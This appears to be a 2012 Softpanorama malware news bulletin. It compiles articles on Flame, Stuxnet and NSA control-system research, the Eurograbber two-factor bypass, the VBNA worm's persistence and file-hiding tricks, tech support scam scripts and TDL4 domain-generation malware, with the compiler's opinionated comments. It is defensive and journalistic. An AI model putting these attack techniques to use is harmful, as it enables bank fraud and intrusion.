Home Switchboard Unix Administration Red Hat TCP/IP Networks Neoliberalism Toxic Managers
May the source be with you, but remember the KISS principle ;-)
Skepticism and critical thinking is not panacea, but can help to understand the world better

Softpanorama Malware Protection Bulletin, 2012

Malware 2019 2018 2017 2016 2015 2014 2013 2012 2011 2010
2009 2008 2007 2006 2005 2004 2003 2002 2001 2000 1999

Top Visited
Past week
Past month


Old News ;-)

[Dec 26, 2012] NSA targeting domestic computer systems in secret test

NSA recognized the danger of "blowback" from Stuxnet. Pandora box is opened. And now the USA as the country with huge number of advanced control systems must pay the price of the luxury of disrupting Iranian uranium enrichment program...

Newly released files show a secret National Security Agency program is targeting the computerized systems that control utilities to discover security vulnerabilities, which can be used to defend the United States or disrupt the infrastructure of other nations.

The NSA's so-called Perfect Citizen program conducts "vulnerability exploration and research" against the computerized controllers that control "large-scale" utilities including power grids and natural gas pipelines, the documents show. The program is scheduled to continue through at least September 2014.

The Perfect Citizen files obtained by the Electronic Privacy Information Center and provided to CNET shed more light on how the agency aims to defend -- and attack -- embedded controllers. The NSA is reported to have developed Stuxnet, which President Obama secretly ordered to be used against Iran's nuclear program, with the help of Israel.

...One NSA employment posting for a Control System Network Vulnerability Analyst says the job involves "building proof-of concept exploits," and an Air Force announcement in August called for papers discussing "Cyberspace Warfare Attack" capabilities. The Washington Post reported last month that Obama secretly signed a directive in October outlining the rules for offensive "cyber-operations."

"Sabotage or disruption of these industries can have wide-ranging negative effects including loss of life, economic damage, property destruction, or environmental pollution," the NSA concluded in a public report (PDF) discussing industrial control systems and their vulnerabilities.

The 190 pages of the NSA's Perfect Citizen files, which EPIC obtained through the Freedom of Information Act last week, are heavily redacted. At least 98 pages were completely deleted for a number of reasons, including that portions are "classified top secret," and could "cause exceptionally grave damage to the national security" if released, according to an accompanying letter from Pamela Phillips, chief of the NSA's FOIA office.

But the portions that were released show that Raytheon received a contract worth up to $91 million to establish Perfect Citizen, which "enables the government to protect the systems," especially "large-scale distributed utilities," operated by the private sector.

The focus is "sensitive control systems," or SCS, which "provide automation of infrastructure processes." Raytheon is allowed to hire up to 28 hardware and software engineers who are supposed to "investigate and document the results of vulnerability exploration and research against specific SCS and devices."

...One job description, for a senior penetration tester, says the position will "identify and demonstrate vulnerabilities," and requires experience using security-related utilities such as Nmap, Tenable's Nessus, Libnet, and Netcat. Raytheon is required not to disclose that this work is being done for the NSA.

The Wall Street Journal disclosed the existence of Perfect Citizen in a 2010 article, which reported the NSA's "surveillance" of such systems relies "on a set of sensors deployed in computer networks for critical infrastructure that would be triggered by unusual activity suggesting an impending cyber attack."

An NSA spokeswoman responded to CNET at the time by saying that Perfect Citizen is "purely a vulnerabilities assessment and capabilities development contract" that "does not involve the monitoring of communications or the placement of sensors on utility company systems."

Marc Rotenberg, EPIC's executive director, said that the newly declassified documents "may help disprove" the NSA's argument that Perfect Citizen doesn't involve monitoring private networks.

The FOIA'd documents say that because the U.S. government relies on commercial utilities for electricity, telecommunications, and other infrastructure requirements, "understanding the technologies utilized in the infrastructure nodes to interoperate on the commercial backbone enables the government to protect the systems."

[Dec 26, 2012] How Do YOU Establish a Secure Computing Environment

Amazingly low level of discussion. Compete degeneration of Slashdot....


I've got a VM that I run on Windows 2000. That OS is no longer patched by Microsoft so I don't want to expose it to the internet. I turned off all the networking protocols and shut off all the services that have to do with I/O. If I open a browser the only site it will connect to is a server I have running inside the VM, which requires a password. I turned off the network shares so there's no chance of getting an infected file from the host machine. The only way to write a file to it is via a USB drive and I scan those before I connect it.

The OS runs great and, with all those unnecessary services turned off, quickly as well.


This is about my personal computing, but I would apply the same general principles to other non-critical environments.

What's the worst thing that could happen to my computers? Someone sneaks into my home and installs a hidden camera to catch everything that's on the screen and all keyboard input, AND they somehow install something to log all network traffic and become the man in the middle when they want to.

How likely is this? Unless the feds confuse me with a terrorist and do this with a warrant, it's exceedingly unlikely.

What are some other "high-loss" risks?

So here's the big question:

What are the security vulnerabilities I can mitigate cheaper than the "cost" of just not having a network-attached computer at all?

Bottom line:


The term "secure" here is used in a bit misleading manner, there's nothing that could possibly be absolutely "secure" in this world, ever.

We should always ask only what amount of security the environment provides. In terms of money.

[Dec 21, 2012] Trojan.Stabuniq Found on Financial Institution Servers


Almost a year ago we added detection for a low prevalence Trojan found on servers belonging to financial institutions, including banking firms and credit unions. The Trojan also compromised home computer users and computers at security firms. For easier identification and tracking we recently renamed this threat to Trojan.Stabuniq

Approximately half of unique IP addresses found with Trojan.Stabuniq belong to home users. Another 11 percent belong to companies that deal with Internet security (due, perhaps, to these companies performing analysis of the threat). A staggering 39 percent, however, belong to financial institutions. These financial institutions had their outer perimeter breached as the Trojan has been found on mail servers, firewalls, proxy servers, and gateways.

Trojan.Stabuniq has relied upon a combination of spam email and Web exploit kits to compromise computers. Over the past year, this threat has only been found in small numbers and has not been widespread, suggesting the authors may have been targeting specific people and entities. The approximate location of unique IP addresses where the Trojan has been found converges on the eastern half of the United States:

The Trojan collects information from the compromised computer and then sends it to a command-and-control (C&C) server. Additional technical details are available.

Overall, this Trojan has not infected many machines in the past year, is localized to the United States, and - given that close to 40 percent of its targets are financial institutions-at this stage we believe the malware authors may simply be gathering information.

[Dec 16, 2012] Sophisticated botnet steals more than $47M by infecting PCs and phones

This is a way too complex... But this scheme does defeat two factor authentication. But the most vulnerable point here for attackers is how to set up the account to which they are transferring the money, and how to cash the money from it?
Dec 5 2012 | ArsTechnica
A new version of the Zeus trojan-a longtime favorite of criminals conducting online financial fraud-has been used in attacks on over 30,000 electronic banking customers in Europe, infecting both their personal computers and smartphones. The sophisticated attack is designed to circumvent banks' use of two-factor authentication for transactions by intercepting messages sent by the bank to victims' mobile phones.

The malware and botnet system, dubbed "Eurograbber" by security researchers from Check Point Software and Versafe, was first detected in Italy earlier this year. It has since spread throughout Europe. Eurograbber is responsible for more than $47 million in fraudulent transfers from victims' bank accounts, stealing amounts from individual victims that range from 500 Euros (about $650) to 25,000 Euros (about $32,000), according to a report published Wednesday (PDF).

The malware attack begins when a victim clicks on a malicious link, possibly sent as part of a phishing attack.

Clicking on the link directs them to a site that attempts to download one or more trojans: customized versions of Zeus and its SpyEye and CarBerp variants that allow attackers to record Web visits and then inject HTML and JavaScript into the victim's browser. The next time the victim visits their bank website, the trojans capture their credentials and launch a JavaScript that spoofs a request for a "security upgrade" from the site, offering to protect their mobile device from attack.

The JavaScript captures their phone number and their mobile operating system information -- which are used in the second level of Eurograbber's attack.

With the phone number and platform information, the attacker sends a text message to the victim's phone with a link to a site that downloads what it says is "encryption software" for the device. But it is, in fact, "Zeus in the mobile" (ZITMO) malware -- a Trojan crafted for the Android and BlackBerry mobile operating systems that injects itself between the user and the mobile browser and SMS messaging software.

With both devices now compromised, the malware waits for the victim to access a bank account, and then immediately transfers a percentage of the victim's balance to an account set up by the criminals running the botnet.

The malware then intercepts the confirmation text message sent by the bank, forwarding it to the trojan's command and control server via a relay phone number. The server uses the message to confirm the transaction and withdraw the money. The same process happens every time the victim logs into their bank account, gradually withdrawing money without alerting the user.

[Dec 16, 2012] How Windows tech support scammers walked right into a trap set by the feds by Jon Brodkin

Dec 5 2012 | ArsTechnica

Three weeks ago, Jack Friedman got a call from a man with an Indian accent claiming to be from the Windows technical team at Microsoft. Friedman, a Florida resident who is my friend Elliot's grandfather, was told by "Nathan James" from Windows that he needed to renew his software protection license to keep his computer running smoothly. "He said I had a problem with my Microsoft system," Friedman told me. "He said they had a deal for $99, they would straighten out my computer and it will be like brand new."

Friedman's three-year-old Windows Vista computer was running a bit slow, as many PCs do. Friedman is often suspicious of unsolicited calls, but after talking with Nathan on the phone and exchanging e-mails, he says, "I figured he was a legitimate guy." Friedman handed over his Capital One credit card number, and the "technician" used remote PC support software to root around his computer for a while, supposedly fixing whatever was wrong with it.

"I could see my arrow going all over the place and clicking different things on my computer," Friedman said. But that $99 Capital One credit card charge turned into a $495 wire transfer. Then Bank of America's fraud department called Friedman, and said, "somebody is trying to get into your account." Whoever it was had entered the wrong password multiple times, and as a precaution Friedman's checking account was shut down.

Capital One restored his lost $495, but the hassles didn't end there. Because of the action Bank of America took, Friedman's checks started bouncing. He's had to change passwords on all his accounts, get new credit cards, and pay a real computer technician $75 to clean out all the junk installed by the scammer.

Friedman is one of thousands of people hoodwinked by this Windows tech support scam, which authorities say has bilked unwitting PC owners out of tens of millions of dollars. Friedman's story shows that the scam is alive and well even though the Federal Trade Commission shut down a bunch of the companies allegedly doing the scamming, as we reported in early October. The FTC filed six lawsuits against more than 30 defendants, a number of whom are in settlement talks with the FTC to end litigation.

Those lawsuits show that the Windows tech support scammers are often just as likely to fall for a good con as anyone else.

To catch a thief: One phone call is all it takes

The Windows tech support scammers all follow the same general script. There are nuances and differences, but the process of convincing people who answer the phone that their PCs are riddled with viruses never changes too much.

You might think that if you spent your whole day calling people on the phone to scam them, if your paycheck depended upon fooling the gullible, that you'd be pretty good at detecting a scam yourself. But ultimately, the people doing the scamming aren't likely to be the masterminds. They're just the work-a-day drones doing their employer's bidding-perfect targets for the undercover investigators at the FTC.

When the FTC announced its crackdown on the tech support scammers, the agency played a recorded undercover call but otherwise didn't spend much time talking about how they tracked the defendants down in the first place. Court documents the FTC subsequently sent our way show that it was rather easy. Or, more precisely, once the difficult groundwork of tracking down the scammers had been laid, the scammers walked right into the FTC's trap, as gullible and helpless as the victims whose bank accounts they raided.

Declarations and transcripts FTC agents filed in US District Court in Southern New York show just how the operations went down. These documents were filed along with the initial complaints, but for whatever reason they did not make it onto the Public Access to Court Electronics Records (PACER) system.

"Did you just call me?"

In a typical Windows tech support scam, the scammer calls up a random person, informing them that their computer has been hijacked by viruses and that the scammer knows this because as a member of the Windows technical support team they can track any computer connected to the Internet. Next, the scammer directs the victim to look at the Windows Event Viewer, a standard part of the Windows operating system that displays mostly harmless error logs. From there, the scammer convinces the victim that these error logs are signs of serious infections and that they need to pay some cash to make the infections go away.

They couldn't even verify whether they had previously called the number used by the undercover FTC agent.

We previously regaled you with the tales of angry and creative citizens of the Internet who turned the tables on the scammers by performing elaborate trolls, and also of Ars editor Nate Anderson's experience playing along with a scam call in order to document what happened.

But that requires waiting for one of the calls to come. What if it doesn't? The FTC's strategy of gathering evidence involved having trained agents go undercover as helpless consumers. No surprise there. But instead of waiting for a call, the FTC's investigators called up the scammers themselves, using undercover identities not associated to the FTC.

"On or about February 14, 2012, when I dialed (888) 408-6651, a representative answered, 'Thank you for calling tech support. My name is Victor. How may I help you?' I said that I had a received a call, the caller had said something about my computer and Microsoft, and that I wanted to know what this was about."

So begins one of the meaty parts of a declaration by FTC investigator Sheryl Novick, who conducted the stings along with FTC paralegal specialist Jennifer Rodden. Novick hadn't received any call-she just called one of the numbers that appeared in numerous consumer complaints. Novick's statement comes from a case against Zeal IT Solutions, but most of the stings went down the same way. Novick's declaration continues:

Victor said they were a tech support company, providing service mainly to Windows users. He told me the name of the company was "Support One Care" and later said they were located in the Eastern part of India. After taking my information, Victor explained that I got a call because they were doing a check-up call for the computer. He asked if my computer was facing any problems but I told him I wasn't sure. He said he was with the technical department and that he'd have to connect me with the registration department and they would call me back. He said I could view their website at '' to see the details of the services they provide.

We hung up because he said he would call me from his number to show me the computer's infections. But he called me back shortly after to tell me someone else would be calling me soon. I received a call back that same day from someone who identified himself as Robin Wilson from the computer technical department of Support One Care. He said they were calling me "because from the past two months, whenever the Windows user have been going online, at that point of time, some malicious infections are automatically getting downloaded... 90 percent of the Windows user have these malicious infections in their hard drive."

He said they were calling to make me aware of the infections.

And the trap was sprung. Although the scammers typically tried to hide their identities and locations by using voice over Internet protocols, they didn't do much else to protect themselves. Windows tech support cold callers have told some victims they have a massive database notifying them each time a computer connected to the Internet is infected. In reality, they're not so omniscient. They couldn't even verify (or just didn't bother to verify) whether they had previously called the number used by the undercover FTC agent. The scammers took the FTC agent's statements at face value and played along more than enough to get shut down and hauled into court.

W32-VBNA-X worm spreads quickly through networks and removable media by Chester Wisniewski

Disable Autorun/Autoplay completely using Microsoft's instructions, which include a "FixIt.
November 30, 2012 | Naked Security


SophosLabs researchers have noticed a significant increase in the spread of malware we call W32/VBNA-X (among other names).

Several other vendors, including McAfee (W32/Autorun.worm.aaeb) and Symantec (W32.ChangeUp), have been alerting their customers as well. While the basic components of this malware have been around for some time, it has become considerably more aggressive in its latest iteration.


W32/VBNA-X is a worm, but also exhibits characteristics typically found in a Trojan. Its most obvious method of spreading appears to be through the use of autorun.inf files dropped on removable media and writable network shares.

You would hope this technique wouldn't be too effective on today's PCs, though. Microsoft released updates for XP, 2003 and Vista in February 2011 to disable Autorun on all media aside from "shiny discs."

It is still not a bad idea to disable Autorun/Autoplay more completely, which is quite easy to do according to Microsoft's instructions, which include a "FixIt."

Most PCs will ignore autorun.inf files these days, so people must be clicking on the malware itself, but why?

It appears to be a cocktail of clever social engineering, poor default settings and user carelessness.

After creating the autorun.inf file for the unpatched victims, it begins to enumerate all of the file and folder names on writable shares and removable devices.

For example, say your E: drive is a network share with folders named au and r and files named as.txt and Adobe.pdf.

It will set all of these to have the hidden attribute and set a registry key to ensure hidden files are not displayed.

Then it will create copies of itself called Porn.exe, Sexy.exe, Passwords.exe and Secret.exe in addition to creating a copy of itself for each legitimate file and folder present on the volume.

The duplicates of the original folders and files will have their icons set to the standard folder icon in Windows 7.

Screenshot of infected file share


In this screenshot you can see the original folders at the top showing their Windows XP icons and the cloned/Trojaned ones with the Windows 7 icons lower down.

The malware appears to assume that you are not showing extensions, which is the default in all releases of Windows.

Infected file share with extensions and hidden files shownI can easily see how people browsing file shares and USB drives could accidentally click the wrong folder, especially if the real folders are set to hidden.

If we show extensions and view all hidden files we see a very different picture.

In addition to the original files and their impostors there are also files called ..exe and ...exe. The malware is also known to write a zero byte file called x.mpeg, although it did not do so in this test instance.

The malware copies itself to the user's profile using a random file name and adds a registry key to start the malware on boot.

Some variants are known to disable Windows Update to prevent the victim from receiving a patch or updated instructions that may disable it.

W32/VBNA-X is also polymorphic so the SHA1 checksums vary for some of the files:

30582368427f752b7b6da4485db456de915101b2 SHA1 for Porn.exe
7ff75f92c5461cc221cb3ab914592bd2a5db6e15 SHA1 for Sexy.exe
d71a89c085ffbb62f4e222fb2f42d7e2271e4642 SHA1 of all the rest

Registry keys created:

    %UserProfile%\%random% /%randomletter% - For persistence

    NoAutoUpdate = 1 - To disable updates

    ShowSuperHidden = 0 - To ensure hidden items stay hidden

You're infected, now what happens?

These samples follow the standard operating procedure for modern malware. Once loaded W32/VBNA-X contacts a command and control (C&C) server to receive instructions for further payloads to download.

The malware attempts to contact the C&Cs on port 9003 using HTTP, although McAfee has reported seeing samples connecting to port 9004 as well.

Many of the DNS names are hosted in the domain space, but the entire list is quite extensive. Administrators who wish to monitor for infections may wish to monitor their firewall logs for connections to ports 900[0-9].

Once the C&C server is contacted a command and URL is passed back to the malware instructing it to download a payload named google.exe which is placed in the users profile directory.

The instances we investigated downloaded banking Trojans belonging to the Zeus/Zbot family, but can frequently change based on time of day or geographic location.


Aside from keeping your anti-virus up to date there are several things you can do and can watch for.

Sophos Anti-Virus on all platforms detects and blocks the various components of this malware as follows:

* W32/VBNA-X: Specific detection for this worm (variants include W32/VBNA-U, W32/VBNA-Z, W32-VBNA-AA and W32/VBNA-AB)
* Mal/SillyFDC-Z Generic worm detections for Autorun.inf files (variants include Mal/Autorun-AX, W32/SillyFDC-IP and W32/AutoInf-DI)
* Troj/Tepfer-E Trojan payloads detected in relation to this malware (variants include Troj/VB-GFM, W32/SillyFDC-IP and Mal/SillyFDC-Z)
* HIPS/RegMod-009 Proactive detection and prevention for registry modifications and persistence

* Customers using Sophos web protection will be prevented from accessing domains known to be involved with this malware

I would like to extend a special thank you to the entire SophosLabs Vancouver team and especially Mike Wood, Peter Szabo and Savio Lau for spending so much extra time to share these details with our readers.

About VirusTotal


What is VirusTotal

VirusTotal, a subsidiary of Google, is a free online service that analyzes files and URLs enabling the identification of viruses, worms, trojans and other kinds of malicious content detected by antivirus engines and website scanners. At the same time, it may be used as a means to detect false positives, i.e. innocuous resources detected as malicious by one or more scanners.

VirusTotal's mission is to help in improving the antivirus and security industry and make the internet a safer place through the development of free tools and services.

VirusTotal's main characteristics are highlighted below.

Free unbiased service

VirusTotal, is offered freely to end users as long as its use has no commercial purpose and does not become part of any business activity. Even though the service works with engines belonging to different enterprises and organizations, VirusTotal does not distribute or advertise any products belonging to third parties, but simply acts as an aggregator of information. This prevents us from being subjected to any kind of bias and allows us to offer an objective service to our users

Runs multiple antivirus engines and website scanners

VirusTotal simply acts as an information aggregator. The aggregated data is the output of different antivirus engines, website scanners, file and URL analysis tools and user contributions. The full list of antivirus solutions and website scanners used in VirusTotal can be found in the credits and collaboration acknowledgements section.

Runs multiple file and URL characterization tools

As previously stated, VirusTotal also aggregates the output of a number of file and URL characterization tools. These tools cover a wide range of purposes, ranging from providing structural information about Microsoft Windows portable executables (PEs) to identifying signed software. The full list of file and URL characterization tools used in VirusTotal can be found in the credits and collaboration acknowledgements section.

Real time updates of virus signatures and blacklists

The malware signatures of antivirus solutions present in VirusTotal are periodically updated as they are developed and distributed by the antivirus companies. The update polling frequency is 15 minutes-this makes sure that the products are using the latest signature sets.

Website scanning is done via API queries to the different companies providing the particular solution, hence, the most updated version of their dataset is always used.

Detailed results from each scanner

VirusTotal not only tells you whether a given antivirus solution detected a submitted file, but also displays the exact detection label returned by each engine (e.g. I-Worm.Allaple.gen).

This feature is also present in URL scanners. Most of them will discriminate malware sites, phishing sites, suspicious sites, etc. Moreover, some of the engines will provide additional information explicitly stating whether a given URL belongs to a particular botnet, which brand is targeted by a given phishing site, etc.

Real time global service operation statistics

Information about the number of resources (files and URLs) processed by VirusTotal can be found in the statistics section. These statistics provide a number of notions and groupings, such as global detection ratios for the received files, submissions per country, most popular detection labels, etc. No statistics comparing the different antivirus products and website detection engines are generated-neither will they ever be generated (on a public or private basis), even though their calculation is trivial. The reason is that using VirusTotal for antivirus testing is a bad idea.

Automation API

File and URL scanning can be automated with a free public API. For obvious reasons (including prevention of competition with the antivirus products present in VirusTotal), the public API is subjected to a strong request rate limitation. Should a user require a higher request rate, a honeypot API is available for researchers and a private mass API is offered to individuals with commercial and product enhancement intentions. A detailed specification of the different APIs can be found in the advanced features section.

Online malware research community

In August 2010 VirusTotal integrated a pseudo-social network that allows its users to interact with other users and comment on files and URLs. These comments may range from deep malware analyses to information on the distribution vector and in-the-wild locations of the submitted files, hence, the community acts as the collective intelligence component of VirusTotal. Files and URLs can be voted as malicious or innocuous, building a community maliciousness score for the resource.

In other words, when security products fail (false positives/false negatives), there is still a chance that some VirusTotal Community user will have produced a useful review of the resource for its community peers.

Desktop applications for interacting with the service

With the aim of making the Internet a safer place VirusTotal's team has released a number of desktop applications and tools for interacting with the service (one-click file uploader, browser extensions, etc.). Many of VirusTotal's users have also developed their own applications and have made them publicly available on the Internet. More information about these resources can be found in the advanced features section.

VirusTotal and confidentiality

Files and URLs sent to VirusTotal will be shared with antivirus vendors and security companies so as to help them in improving their services and products. We do this because we believe it will eventually lead to a safer Internet and better end-user protection.

By default any file/URL submitted to VirusTotal which is detected by at least one scanner is freely sent to all those scanners that do not detect the resource. Additionally, all files and URLs enter a private store that may be accessed by premium (mainly security/antimalware companies/organizations) VirusTotal users so as to improve their security products and services.

[Nov 29, 2012] Real-World Cyber City Used To Train Cyber Warriors

Posted by Soulskill
from the augmented-reality-mmo-for-hackers dept.

Orome1 writes "NetWars CyberCity is a small-scale city located close by the New Jersey Turnpike complete with a bank, hospital, water tower, train system, electric power grid, and a coffee shop. It was developed to teach cyber warriors from the U.S. military how online actions can have kinetic effects. Developed in response to a challenge by U.S. military cyber warriors, NetWars CyberCity is an intense defensive training program organized around missions. 'We've built over eighteen missions, and each of them challenges participants to devise strategies and employ tactics to thwart computer attacks that would cause significant real-world damage,' commented Ed Skoudis, SANS Instructor and NetWars CyberCity Director."

[Nov 29, 2012 ] Virus Eats School District's Homework

That is simply ridiculous. Can't they just restore images like they are doing with computer in University labs.

"Forget about 'snow days' - the kids in the Lake Washington School District could probably use a few 'virus days.' Laptops issued to each student in grades 6-12 were supposed to accelerate learning ('Schools that piloted the laptops found that students stayed engaged nad [sic] organized whiel [sic] boosting creativity,' according to the district's Success Stories), but GeekWire reports that a computer virus caused havoc for the district as it worked its way through the Windows 7 computers, disrupting class and costing the district money - five temporary IT staff members were hired to help contain the virus. Among the reasons cited for the school district's choice of PCs over Mac's were the proximity to Microsoft HQ (Redmond is in the district), Microsoft's involvement in supporting local and national education, and last but not least, cost. In the past, the Lake Washington School District served as a Poster Child of sorts for Microsoft's Trustworthy Computing Group."

[Nov 25, 2012] Browser Guard 2011

This is a good start, but we really need something that blocks sites which has DNS just registered by the same person/organization who previously registered malicious sites. OpenDNS is one possibility. Symantec DNS is another.

Trend Micro USA

Proactively protect your browser against new web threats. Browser Guard 2011 has zero-day vulnerability prevention and protects against malicious JavaScript using advanced heuristics and emulation technologies.

Browser Guard is quickly and continuously updated to deliver the most secure and up-to-date technology. The latest version includes detection enhancement for Web Trojans, and for tracing infection chains

[Nov 25, 2012] Trend Micro Browser Guard v2.0

Trend Micro Browser Guard 2010 is an Internet Explorer plug-in that monitors the pages you visit to protect you from malicious JavaScript.

The program works entirely automatically, so there are no complex settings to consider, no configuration worries at all. Just install it and Browser Guard will analyse any JavaScript on the pages you visit, detecting buffer overflow and heap spray attacks, blocking attempts to execute shell code, and generally keeping you just a little safer online.

While you might expect this extra layer of protection would slow down your browsing a little, there was no noticeable change on our test PC (and IE told us the add-on took a mere 0.03 seconds to launch). If you're running an old underpowered laptop then maybe you'll see a performance impact, but otherwise there are unlikely to be any problems.

Otherwise the program seems very compatible, running on 32 or 64-bit Windows XP, Vista or 7, and all versions of Internet Explorer from 6 to 9.0, and is most unlikely to conflict with any other security software. So if you use IE, even only occasionally, then Browser Guard 2010 offers an easy way to gain a little extra protection from malicious websites.

[Nov 24, 2012]

In my case I just re-imaged the infected computer using Softpanorama Malware Defense Strategy without much analyses.

In the case that I know of, the PC was infected by broswing Web site (probably shareware website), not by any email attachment.

There are three files in "C:\Documents and Settings\dell\Start Menu\Programs\Startup\"

-r-xr-xr-x+ 1 nnb None  53121 Dec  9  2010 kiaqas.exe
-r-xr-xr-x+ 1 nnb None  57217 Dec  9  2010 mssvig.exe
-r-xr-xr-x+ 1 nnb None  53121 Dec  9  2010 stdlas.exe

If you delete or rename them in Windows, they reappear. They might be related to Trojan-GameThief.Win32.

This Trojan is designed to steal account data and passwords. Probably exists is several modification tuned to different online game targets.

[Nov 24, 2012] U.S. Denies Using Flame Malware To Spy On French President

November 23 | Slashdot

CowboyRobot writes with the (not unexpected) official U.S. denial of using the Flame malware to spy on France. From the article: "That allegation was leveled at the U.S. government by unnamed French officials, according to a Tuesday report in the weekly French newspaper L'Express. It reported that computers belonging to top advisers to then French president Nicolas Sarkozy had been hacked using the Flame cyberespionage malware, which was designed to be used in highly targeted attacks... Napolitano was also asked if it wasn't ironic that while the United States has been sounding alarms over the growing amount of malware that's targeting U.S. government system, it also commissioning the Stuxnet and Flame cyber-espionage malware used against Iran. Napolitano, however, pled official ignorance. 'These programs were never attributed in any way to the U.S. government.'"


France has often gone its own way - from banking with gold, post ww2 occupation of Germany, pre Vietnam, weapon sales, NATO nuclear policy, 'freedom fighter' support in Libya, Syria...
Aerospace, advanced space platforms, bridge building/telco/dams/nuclear/oil/mining contracts- France is just very good at building stuff at a fair rate or for its friends around the world and the USA sees that as its unique profit pool.
France knows the NSA loves to watch French trade deals and all French political leaders and report on any trade deals not won by the USA.
Did something very bad happen in Libya wrt to Syria and SAM like systems?
Is France going its own way with Syrian "freedom fighters" and offering much more exotic weapons found in Libya? Are some parts of the US gov very upset?
Is the USA going its own way with Syrian "freedom fighters" and offering much more exotic weapons found in Libya? Are some parts of the French very gov upset?
As for why?
France knows of ECHELON, they know of the origins of Flame....
Why is France running Windows at that level on the 'net'? Why would the US do this to France in such an open, foolish way?
Or was a well known 3rd party playing games with the French/US relationship and wanted a public 'issue' out the story.
The final option? The USA watches France and its trade but older US spies should recall Vladimir Vetrov- France was very helpful to the US - Has the US lost control of a part of its new "younger" cyber command?


Why is France running Windows at that level on the 'net'?

Change is always seen as annoying by users, and top level executive users have power to resist change, if they are stupid enough to not understand why they need it. I am not sure french military security experts would have been able to impose something to Sarkozy and its counselors

[Nov 24, 2012] US, Israel Behind Flame Malware

June 19 | Slashdot

The Washington Post is reporting that the sophisticated 'Flame' malware was created by the United States and Israel in order to collect intelligence on Iranian computer networks. The intel was to be used in a cyber-sabotage campaign intended to slow Iran's development of nuclear weapons. This follows confirmation a few weeks ago that the U.S. and Israel were behind Stuxnet, which caused problems at Iran's nuclear facilities. From the article: "The emerging details about Flame provide new clues to what is thought to be the first sustained campaign of cyber-sabotage against an adversary of the United States. 'This is about preparing the battlefield for another type of covert action,' said one former high-ranking U.S. intelligence official, who added that Flame and Stuxnet were elements of a broader assault that continues today. 'Cyber-collection against the Iranian program is way further down the road than this.' ... The scale of the espionage and sabotage effort 'is proportionate to the problem that's trying to be resolved,' the former intelligence official said, referring to the Iranian nuclear program. Although Stuxnet and Flame infections can be countered, 'it doesn't mean that other tools aren't in play or performing effectively,' he said."

[Oct 03, 2012] Elusive TDL4 malware variant infected Fortune 500 companies, gov't agencies by Lucian Constantin

While information on DGA is interesting, "researchers from security vendor Damballa" like any "security vendor researchers" are far from being the most trustworthy folk in such cases. They usually promote FUD in the interests of their companies and are as close to PR scum as one can get. See also TDL4
September 18, 2012 | Computerworld

Researchers from security vendor Damballa have identified malicious Internet traffic that they believe is generated by a new and elusive variant of the sophisticated TDL4 malware.

The new threat, which has been assigned the generic name DGAv14 until its true nature is clarified, has affected at least 250,000 unique victims so far, including 46 of the Fortune 500 companies, several government agencies and ISPs, the Damballa researchers said in a research paper released Monday.

On July 8, Damballa sensors that operate on the networks of telecommunication operators and ISPs that partnered with the company detected a new pattern of DNS (Domain Name System) requests for non-existent domains. Such traffic suggests the presence on the network of computers infected with malware that uses a domain generation algorithm (DGA),

Some malware creators use DGAs in order to evade network-level domain blacklists and to make their command and control infrastructure more resilient against takedown attempts.

DGAs generate a number of random-looking domain names at predefined time intervals for the malware to connect to. Because the attackers know which domain names their algorithm will generate and access at a future point in time, they can register some of them in advance and use them to issue commands to infected computers.

Even if those domains are later shut down, the overall operation is not affected because the malware will generate and use different domain names in the future.

In collaboration with researchers from the Georgia Tech Information Security Center (GTISC), the Damballa researchers registered some of the domain names the new threat was attempting to access and monitored the traffic it sent to them.

This type of action is known as sinkholing and, in this case, it revealed that the new malware is part of a click-fraud operation that involves rogue advertisements being injected into various websites including,,,, and when opened on infected computers,

An analysis of other domain names registered by the attackers themselves and the networks where they hosted those domains revealed similarities to the command and control infrastructure used by the gang behind the TDL4 malware family.

TDL4, also known as TDSS, is considered to be one of the most sophisticated malware threats ever created and used by cybercriminals -- without counting threats like Stuxnet, Flame, Gauss and others that are believed to have been created by nation states for cyberespionage purposes.

TDL4 is part of a category of malware known as bootkits -- boot rootkits -- because it infects the hard disk drive's Master Boot Record (MBR), the sector that contains information about a disk's partition table and the file systems. The code that resides in the MBR is executed before the OS actually starts.

[Oct 03, 2012] Sorry, but the TDL botnet is not 'indestructible' Malware by Roger A. Grimes

See also TDL4
June 30, 2011 |

Malware and alarmism over its proliferation are nothing new -- and the latest boot-sector rootkit will be cured soon enough

The sophistication of the TDL rootkit and the global expanse of its botnet have many observers worried about the antimalware industry's ability to respond. Clearly, the TDL malware family is designed to be difficult to detect and remove. Several respected security researchers have gone so far as to say that the TDL botnet, composed of millions of TDL-infected PCs, is "practically indestructible."

As a 24-year veteran of the malware wars, I can safely tell you that no threat has appeared that the antimalware industry and OS vendors did not successfully respond to. It may take months or years to kill off something, but eventually the good guys get it right.

This isn't the first time we're supposed to be scared of MBR (master boot record)-infecting malware. In 1987, well before the days of the Internet, the Stoned boot virus infected millions of PCs around the world. Subsequent "improvements" in hacking allowed malware authors to create DOS viruses that could manipulate the operating system to hide themselves from prying eyes. (Actually, the first IBM PC virus, Pakistani Brain did this in 1986, too.) Computer viruses became encrypted and polymorphic, and they started taking data hostage.

With each ratcheting iteration of new malware offense, you had analysts and doomsayers predicting this or that particular malware program would be difficult to impossible to defend against. But each time the antimalware industry and other software vendors responded to defang the latest threat. Yesterday's indestructible virus became tomorrow's historical footnote.

Even today's malware masterpiece, Stuxnet -- as perfect as it is for its intended military job -- could be neutralized if it became superpopular. Luckily, military-grade worms are few and far between, so most users don't have to suffer while waiting for defenses to be developed.

The truth is, like every other malware family variant, TDL and its botnet will probably be around for years to exploit millions of additional PCs. But it didn't take an advanced superbot to do that. Take a look at any monthly WildList tally. It always contains malware programs written years ago.

Today, almost every malware program lives in perpetuity, dying off only when the exploited program or process dies with it. Boot viruses from the 1980s and 1990s didn't stop being a threat until floppy disks and disk drives went away. Macro viruses didn't die until people stopped writing macros and Microsoft Office disabled automacros by default.

No, what really bothers me more are the malware programs that do something completely new because it takes so much longer for antimalware programs, software vendors, and users to adapt to the tactic. For instance, it took us years to teach folks not to open every file attachment to defeat email viruses and worms -- but it takes the bad guys only a few minutes to change strategies. Today, we need to tell folks not to click on the Internet link emailed to them by a trusted friend and not to install random applications sent to them in Facebook or through their mobile phone.

But our biggest threat is an MBR PC-infector? Been there, done that.

This article, "Sorry, but the TDL botnet is not 'indestructible'," was originally published at Get the first word on what the important tech news really means with the InfoWorld Tech Watch blog. For the latest business technology news, follow on Twitter.

[Oct 03, 2012] Tdl-4 boot bot virus reformat good enough to kill it - Yahoo! Answers

See also TDL4
Microsoft developed this just for this Microsoft Standalone System Sweeper Beta…

